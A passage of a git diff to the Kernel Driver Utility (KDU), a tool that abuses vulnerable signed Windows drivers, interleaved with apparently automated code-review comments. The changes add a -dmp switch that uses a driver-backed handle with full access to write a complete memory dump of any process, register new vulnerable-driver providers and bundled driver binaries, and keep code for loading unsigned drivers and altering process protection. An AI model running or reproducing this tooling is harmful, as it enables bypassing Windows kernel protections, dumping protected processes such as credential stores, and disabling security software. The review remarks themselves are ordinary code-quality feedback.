"kdu -map filename - Map driver to the kernel and execute it entry point, this command have dependencies listed below\r\n"\
@@ -49,6 +51,37 @@
#define T_PRNTDEFAULT "%s\r\n"
+/*
+* KDUProcessDmpSwitch
+*
+* Purpose:
+*
+* Handle -dmp switch.
+*
+*/
+INT KDUProcessDmpSwitch(
+ _In_ ULONG HvciEnabled,
+ _In_ ULONG NtBuildNumber,
+ _In_ ULONG ProviderId,
+ _In_ HANDLE ProcessId)
+{
+ INT retVal = 0;
+ KDU_CONTEXT* provContext;
+
+ provContext = KDUProviderCreate(ProviderId,
+ HvciEnabled,
+ NtBuildNumber,
+ KDU_SHELLCODE_NONE,
+ ActionTypeDumpProcess);
+
+ if (provContext) {
+ retVal = KDUDumpProcessMemory(provContext, ProcessId);
+ KDUProviderRelease(provContext);
+ }
+
+ return retVal;
+}
+
/*
* KDUProcessPSEObjectSwitch
*
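Review bot: `retVal = KDUDumpProcessMemory(provContext, ProcessId);` stores a BOOL (the ps.h prototype in this diff declares it so) into the INT that KDUProcessDmpSwitch returns, so the switch yields 1 on success and 0 on failure or when the provider could not be created. If that INT ends up as the process exit code, as the name and the sibling KDUProcessPSEObjectSwitch suggest, this inverts the usual zero-means-success convention — compare with how the sibling maps its result. If the mapping is intentional, a one-line comment `// BOOL result: non-zero on success` above the assignment would save the next reader the trip.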
@@ -370,7 +403,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_PRV,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
providerId = _strtoul(szParameter);
@@ -399,7 +432,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_DSE,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
dseValue = _strtoul(szParameter);
@@ -416,7 +449,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_MAP,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
¶mLength))
{
if (paramLength == 0) {
@@ -435,7 +468,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_SCV,
TRUE,
szExtraParameter,
- sizeof(szExtraParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szExtraParameter),
NULL))
{
shellVersion = _strtoul(szExtraParameter);
@@ -460,7 +493,7 @@ INT KDUProcessCommandLine(
supGetCommandLineOption(CMD_DRVNAME,
TRUE,
szDriverName,
- sizeof(szDriverName) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szDriverName),
¶mLength);
lpParam1 = (paramLength != 0) ? szDriverName : NULL;
@@ -470,7 +503,7 @@ INT KDUProcessCommandLine(
supGetCommandLineOption(CMD_DRVREG,
TRUE,
szDriverRegPath,
- sizeof(szDriverRegPath) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szDriverRegPath),
¶mLength);
lpParam2 = (paramLength != 0) ? szDriverRegPath : NULL;
@@ -494,7 +527,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_PS,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
processId = strtou64(szParameter);
@@ -508,7 +541,7 @@ INT KDUProcessCommandLine(
else if (supGetCommandLineOption(CMD_PSE,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
@@ -517,6 +550,20 @@ INT KDUProcessCommandLine(
szParameter);
}
+ else if (supGetCommandLineOption(CMD_DMP,
+ TRUE,
+ szParameter,
+ RTL_NUMBER_OF(szParameter),
+ NULL))
+ {
+ processId = strtou64(szParameter);
+
+ retVal = KDUProcessDmpSwitch(HvciEnabled,
+ NtBuildNumber,
+ providerId,
+ (HANDLE)processId);
+ }
+
else {
//
// Nothing set, show help.
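Review bot: The -dmp branch casts the result of `strtou64(szParameter)` straight to HANDLE with no validation, so an empty or non-numeric argument presumably parses to 0 and is handed to the provider as a PID, where it is then reported as a provider or lookup failure rather than as bad input. Rejecting a zero result before the call — print an error via supPrintfEvent(kduEventError, ...) and skip KDUProcessDmpSwitch — keeps the two failure classes distinct. The -ps branch above parses the same way, but any check it performs afterwards lies outside this hunk, as does the rest of KDUProcessCommandLine.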
@@ -664,13 +711,14 @@ VOID KDUIntroBanner()
{
IMAGE_NT_HEADERS* ntHeaders = RtlImageNtHeader(NtCurrentPeb()->ImageBaseAddress);
- printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2023 KDU Project\r\n"\
+ printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - %lu KDU Project\r\n"\
"[#] Built at %s, header checksum 0x%lX\r\n"\
"[#] Supported x64 OS : Windows 7 and above\r\n",
KDU_VERSION_MAJOR,
KDU_VERSION_MINOR,
KDU_VERSION_REVISION,
KDU_VERSION_BUILD,
+ KDU_COPYRIGHT_YEAR,
__TIMESTAMP__,
ntHeaders->OptionalHeader.CheckSum);
}
diff --git a/Source/Hamakaze/ps.cpp b/Source/Hamakaze/ps.cpp
index 5664c1c..5bf0a5c 100644
--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PS.CPP
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 20 Oct 2023
*
* Processes DKOM related routines.
*
@@ -18,6 +18,16 @@
*******************************************************************************/
#include "global.h"
+#include
+
+typedef BOOL (WINAPI *pfnMiniDumpWriteDump)(
+ _In_ HANDLE hProcess,
+ _In_ DWORD ProcessId,
+ _In_ HANDLE hFile,
+ _In_ MINIDUMP_TYPE DumpType,
+ _In_opt_ PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
+ _In_opt_ PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
+ _In_opt_ PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
LPSTR KDUGetProtectionTypeAsString(
_In_ ULONG Type
@@ -87,7 +97,110 @@ LPSTR KDUGetProtectionSignerAsString(
}
/*
-* KDUControlProcess
+* KDUDumpProcessMemory
+*
+* Purpose:
+*
+* Dump process memory.
+*
+*/
+BOOL KDUDumpProcessMemory(
+ _In_ PKDU_CONTEXT Context,
+ _In_ HANDLE ProcessId
+)
+{
+ BOOL bResult = FALSE;
+ HMODULE dbgModule;
+ HANDLE hFile = INVALID_HANDLE_VALUE;
+ HANDLE processHandle = NULL;
+ pfnMiniDumpWriteDump pMiniDumpWriteDump;
+
+ WCHAR szOutputName[MAX_PATH];
+ union {
+ PSYSTEM_PROCESS_INFORMATION Process;
+ PBYTE ListRef;
+ } List;
+
+ PSYSTEM_PROCESS_INFORMATION procEntry = NULL;
+ PVOID procBuffer = supGetSystemInfo(SystemProcessInformation);
+
+ do {
+
+ List.ListRef = (PBYTE)procBuffer;
+ if (List.ListRef == NULL) {
+ supPrintfEvent(kduEventError, "Cannot allocate process list\r\n");
+ break;
+ }
+
+ if (!ntsupQueryProcessEntryById(ProcessId, List.ListRef, &procEntry)) {
+
+ supPrintfEvent(kduEventError,
+ "The %lX process doesn't exist in process list\r\n",
+ HandleToUlong(ProcessId));
+
+ break;
+ }
+
+ supPrintfEvent(kduEventInformation, "[+] Dumping memory of the process 0x%lX (%wZ)\r\n",
+ HandleToUlong(ProcessId), procEntry->ImageName);
+
+ dbgModule = LoadLibraryEx(L"dbghelp.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
+ if (dbgModule == NULL) {
+ supShowWin32Error("[!] Cannot load dbghelp.dll", GetLastError());
+ break;
+ }
+
+ pMiniDumpWriteDump = (pfnMiniDumpWriteDump)GetProcAddress(dbgModule, "MiniDumpWriteDump");
+ if (pMiniDumpWriteDump == NULL) {
+ supShowWin32Error("[!] Dump function is not found", GetLastError());
+ break;
+ }
+
+ bResult = KDUOpenProcess(Context, ProcessId, PROCESS_ALL_ACCESS, &processHandle);
+ if (!bResult || processHandle == NULL) {
+ supShowWin32Error("[!] Cannot open process", GetLastError());
+ break;
+ }
+
+ StringCchPrintf(szOutputName,
+ RTL_NUMBER_OF(szOutputName),
+ TEXT("vmem_pid_%lX.dmp"),
+ HandleToUlong(ProcessId));
+
+ hFile = CreateFile(szOutputName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
+ if (hFile == INVALID_HANDLE_VALUE) {
+ supShowWin32Error("[!] Cannot write memory dump", GetLastError());
+ break;
+ }
+
+ bResult = pMiniDumpWriteDump(processHandle,
+ 0,
+ hFile,
+ MiniDumpWithFullMemory,
+ NULL,
+ NULL,
+ NULL);
+
+ if (bResult) {
+ supPrintfEvent(kduEventInformation, "[+] Process memory dumped to %ws\r\n", szOutputName);
+ }
+ else {
+ supShowWin32Error("[!] Cannot dump process", GetLastError());
+ }
+
+ } while (FALSE);
+
+ if (procBuffer) supHeapFree(procBuffer);
+ if (processHandle) NtClose(processHandle);
+
+ if (hFile != INVALID_HANDLE_VALUE)
+ CloseHandle(hFile);
+
+ return bResult;
+}
+
+/*
+* KDURunCommandPPL
*
* Purpose:
*
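Review bot: In the supPrintfEvent call that announces the dump, `%wZ` expects a pointer to a UNICODE_STRING but receives `procEntry->ImageName` by value; it should be `&procEntry->ImageName`. On x64 MSVC this probably prints correctly because aggregates larger than 8 bytes are passed to variadic functions by reference, but it remains a format/argument mismatch. The handle is requested with `PROCESS_ALL_ACCESS` although MiniDumpWriteDump needs only `PROCESS_QUERY_INFORMATION | PROCESS_VM_READ`, so the call asks the driver for far more access than the operation uses. `dbgModule` is never released and is left uninitialised on the early-break paths; initialising it to NULL and adding `if (dbgModule) FreeLibrary(dbgModule);` to the cleanup block keeps the resource handling symmetric with the file and process handles.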
@@ -123,14 +236,14 @@ BOOL KDURunCommandPPL(
&si, // Pointer to STARTUPINFO structure
&pi); // Pointer to PROCESS_INFORMATION structure
if (!bResult) {
- printf("[!] Failed to create process: 0x%lX\n", GetLastError());
+ supShowWin32Error("[!] Failed to create process", GetLastError());
return bResult;
}
printf_s("[+] Created Process with PID %lu\r\n", pi.dwProcessId);
bResult = KDUControlProcess(Context, pi.dwProcessId, PsProtectedSignerAntimalware, PsProtectedTypeProtectedLight);
if (!bResult) {
- printf_s("[!] Failed to set process as PPL: 0x%lX\n", GetLastError());
+ supShowWin32Error("[!] Failed to set process as PPL", GetLastError());
return bResult;
}
@@ -151,7 +264,7 @@ BOOL KDURunCommandPPL(
}
/*
-* KDUControlProcess
+* KDUUnprotectProcess
*
* Purpose:
*
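Review bot: The comment block is renamed to `KDUUnprotectProcess`, but the function it documents is still `KDUControlProcess` — the next hunk's header and the ps.h prototype in this same diff both carry that name — so the header now points at a symbol that does not exist. Either revert the line to `* KDUControlProcess` or rename the function together with its prototype and callers in one change. The function body lies outside this hunk.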
@@ -203,9 +316,9 @@ BOOL KDUControlProcess(
if (NT_SUCCESS(ntStatus)) {
printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
- supQueryObjectFromHandle(hProcess, &ProcessObject);
+ bResult = supQueryObjectFromHandle(hProcess, &ProcessObject);
- if (ProcessObject != 0) {
+ if (bResult && (ProcessObject != 0)) {
printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);
diff --git a/Source/Hamakaze/ps.h b/Source/Hamakaze/ps.h
index 2ed456a..80d15bf 100644
--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2022
+* (C) COPYRIGHT AUTHORS, 2018 - 2023
*
* TITLE: PS.H
*
-* VERSION: 1.28
+* VERSION: 1.40
*
-* DATE: 01 Dec 2022
+* DATE: 20 Oct 2023
*
* Processes support prototypes and definitions.
*
@@ -38,6 +38,10 @@ BOOL KDURunCommandPPL(
_In_ PKDU_CONTEXT Context,
_In_ LPWSTR CommandLine);
+BOOL KDUDumpProcessMemory(
+ _In_ PKDU_CONTEXT Context,
+ _In_ HANDLE ProcessId);
+
BOOL KDUControlProcess(
_In_ PKDU_CONTEXT Context,
_In_ ULONG_PTR ProcessId,
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 3c423e5..fb862f3 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index 57239ba..02c005f 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index b6cf89d..e134c7e 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,3,4,2309
- PRODUCTVERSION 1,3,4,2309
+ FILEVERSION 1,4,0,2310
+ PRODUCTVERSION 1,4,0,2310
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.3.4.2309"
+ VALUE "FileVersion", "1.4.0.2310"
VALUE "InternalName", "Hamakaze.exe"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.3.4.2309"
+ VALUE "ProductVersion", "1.4.0.2310"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index c86f145..ebb9f76 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -4,9 +4,9 @@
*
* TITLE: TESTS.CPP
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* KDU tests.
*
@@ -188,7 +188,7 @@ VOID KDUTest()
// KDUTestLoad();
// TestSymbols();
- Context = KDUProviderCreate(40,
+ Context = KDUProviderCreate(42,
FALSE,
NT_WIN10_20H1,
KDU_SHELLCODE_V1,
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index b22befb..76e8114 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* Global consts.
*
@@ -20,16 +20,17 @@
#pragma once
#define KDU_VERSION_MAJOR 1
-#define KDU_VERSION_MINOR 3
-#define KDU_VERSION_REVISION 4
-#define KDU_VERSION_BUILD 2309
+#define KDU_VERSION_MINOR 4
+#define KDU_VERSION_REVISION 0
+#define KDU_VERSION_BUILD 2310
+#define KDU_COPYRIGHT_YEAR 2023
#define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1
#define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined
#define IPC_GET_HANDLE 0x1337
-#define KDU_SYNC_MUTANT 0x2309
+#define KDU_SYNC_MUTANT 0x2310
#define NT_REG_PREP L"\\Registry\\Machine"
#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
@@ -63,15 +64,15 @@
#define PROVIDER_RES_KEY 0xF62E6CE0
-#define SYSTEM_PID_MAGIC 4
+#define SYSTEM_PID_MAGIC 4
-#define TEXT_SECTION ".text"
-#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
+#define TEXT_SECTION ".text"
+#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
-#define SHELLCODE_SMALL 0x200
+#define SHELLCODE_SMALL 0x200
#ifndef MAX_CLASS_NAME_LEN
-#define MAX_CLASS_NAME_LEN 256
+#define MAX_CLASS_NAME_LEN 256
#endif
//
@@ -103,6 +104,7 @@
#define IDR_PROCEXP1627 2000
#define IDR_PROCEXP1702 2001
#define IDR_INTEL_NAL 103
+#define IDR_RZPNK 104
#define IDR_RTCORE64 105
#define IDR_GDRV 106
#define IDR_ATSZIO64 107
@@ -140,9 +142,10 @@
#define IDR_KEXPLORE 139
#define IDR_KOBJEXP 140
#define IDR_KREGEXP 141
-#define IDR_RESERVED8 142
+#define IDR_PHYDMACC 142
#define IDR_ECHODRV 143
#define IDR_NVOCLOCK 144
+#define IDR_IREC 145
//
// Vulnerable drivers providers id
@@ -188,6 +191,9 @@
#define KDU_PROVIDER_KREGEXP 38
#define KDU_PROVIDER_ECHODRV 39
#define KDU_PROVIDER_NVOCLOCK 40
+#define KDU_PROVIDER_BINALYZE_IREC 41
+#define KDU_PROVIDER_PHYDMACC 42
+#define KDU_PROVIDER_RAZER 43
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
@@ -258,6 +264,11 @@
//
#define KDUPROV_FLAGS_USE_SYMBOLS 0x00000800
+//
+// Provider can be used to open a handle for the specified process.
+//
+#define KDUPROV_FLAGS_OPENPROCESS_SUPPORTED 0x00001000
+
//
// KDU shellcode support flags
//
diff --git a/Source/Shared/kdubase.h b/Source/Shared/kdubase.h
index 84b8639..be1e2cb 100644
--- a/Source/Shared/kdubase.h
+++ b/Source/Shared/kdubase.h
@@ -53,7 +53,8 @@ typedef struct _KDU_DB_ENTRY {
ULONG PreferVirtual : 1;
ULONG CompanionRequired : 1;
ULONG UseSymbols : 1;
- ULONG Reserved : 20;
+ ULONG OpenProcessSupported : 1;
+ ULONG Reserved : 19;
};
};
ULONG SupportedShellFlags;
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index 9573dc3..070a6d1 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -207,6 +207,7 @@
+
@@ -218,6 +219,7 @@
+
@@ -225,6 +227,7 @@
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index 3499161..37d150d 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -181,6 +181,15 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/AsusCertService.bin b/Source/Tanikaze/data/AsusCertService.bin
index befd303..bf3b089 100644
Binary files a/Source/Tanikaze/data/AsusCertService.bin and b/Source/Tanikaze/data/AsusCertService.bin differ
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index aa1b6b9..ae8f343 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index 1880358..4f5a599 100644
--- a/Source/Tanikaze/data/KMUSIG.bin
+++ b/Source/Tanikaze/data/KMUSIG.bin
@@ -1,2 +1,2 @@
-°€°7ïq‡åù°zæÃ,]ãqq«>Vf[æÒ&S–>§˜oœƒÖ°ÝükFzQ šÊy,°-Ò·}eÎI8×ôq^gÉ0¤”^ Áûr*œ(®ò™aÃ7p}‡?š4FjB\0K$1g^퉄”Œ¸bÿÓïV`Í´µý%뇱Þ7—*óÙÖ¯>ôÌwiá
+°€°7ï-Vf[æÒ&S–>§˜oœƒÖ°ÝükFzQ šÊy,°-Ò·}eÎI8×ôq^gÉ0¤”^ Áûr*œ(®ò™aÃ7p}‡?š4FjB\0K$1g^퉄”Œ¸bÿÓïV`Í´µý%뇱Þ7—*óÙÖ¯>ôÌwiá
mV?‰SHèæ/Œ0£8”ÎHˆ
]àì
\ No newline at end of file
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index 3e1c88f..a77585d 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index 056bceb..bf8e745 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index 1f5e5c4..417f423 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin
index f908e0e..f6d4c82 100644
Binary files a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin and b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index ee80e84..d72e2e9 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index 53c79b6..55979ab 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index e5854b7..d8e1e48 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index 3f988c3..9a3e8b1 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index 9f63526..bfa61d7 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index 1ce9085..b101ea3 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 8a0c497..b816db1 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index 28f6a2d..6abbfa7 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index ca6d069..e2605fb 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index 87640d4..2ef2c37 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/KExplore.bin b/Source/Tanikaze/drv/KExplore.bin
index 1d5a905..2c28ad6 100644
Binary files a/Source/Tanikaze/drv/KExplore.bin and b/Source/Tanikaze/drv/KExplore.bin differ
diff --git a/Source/Tanikaze/drv/KObjExp.bin b/Source/Tanikaze/drv/KObjExp.bin
index b8a00b2..34c0979 100644
Binary files a/Source/Tanikaze/drv/KObjExp.bin and b/Source/Tanikaze/drv/KObjExp.bin differ
diff --git a/Source/Tanikaze/drv/KRegExp.bin b/Source/Tanikaze/drv/KRegExp.bin
index 669a732..edf5c4c 100644
Binary files a/Source/Tanikaze/drv/KRegExp.bin and b/Source/Tanikaze/drv/KRegExp.bin differ
diff --git a/Source/Tanikaze/drv/LDD.bin b/Source/Tanikaze/drv/LDD.bin
index c8119da..66b3f3c 100644
Binary files a/Source/Tanikaze/drv/LDD.bin and b/Source/Tanikaze/drv/LDD.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index f10f888..c2093ae 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/PhyDMACC.bin b/Source/Tanikaze/drv/PhyDMACC.bin
new file mode 100644
index 0000000..cb58ce6
Binary files /dev/null and b/Source/Tanikaze/drv/PhyDMACC.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index 9f138ff..ea4e5d9 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 051cbe0..5230d68 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index 39a7857..54814f4 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index f5a5090..978ddf5 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 2e849bb..a9d7d0e 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index 1273ef2..a13ca24 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index fb94740..635d538 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 7a79e3c..4cd2723 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/echo_driver.bin b/Source/Tanikaze/drv/echo_driver.bin
index 08dbebc..2177f3a 100644
Binary files a/Source/Tanikaze/drv/echo_driver.bin and b/Source/Tanikaze/drv/echo_driver.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 6a1a061..869c83e 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/etdsupp.bin b/Source/Tanikaze/drv/etdsupp.bin
index 3e86758..5a998fc 100644
Binary files a/Source/Tanikaze/drv/etdsupp.bin and b/Source/Tanikaze/drv/etdsupp.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index 7ee327f..ee17a80 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index 6f16167..3d29c72 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/heavenluo.bin b/Source/Tanikaze/drv/heavenluo.bin
index bb62660..1549cac 100644
Binary files a/Source/Tanikaze/drv/heavenluo.bin and b/Source/Tanikaze/drv/heavenluo.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index ea6d24e..ecd7740 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index 94dd1ec..046e157 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/irec.bin b/Source/Tanikaze/drv/irec.bin
new file mode 100644
index 0000000..855b7da
Binary files /dev/null and b/Source/Tanikaze/drv/irec.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index a317516..662ca8e 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index 9c41f30..d23c417 100644
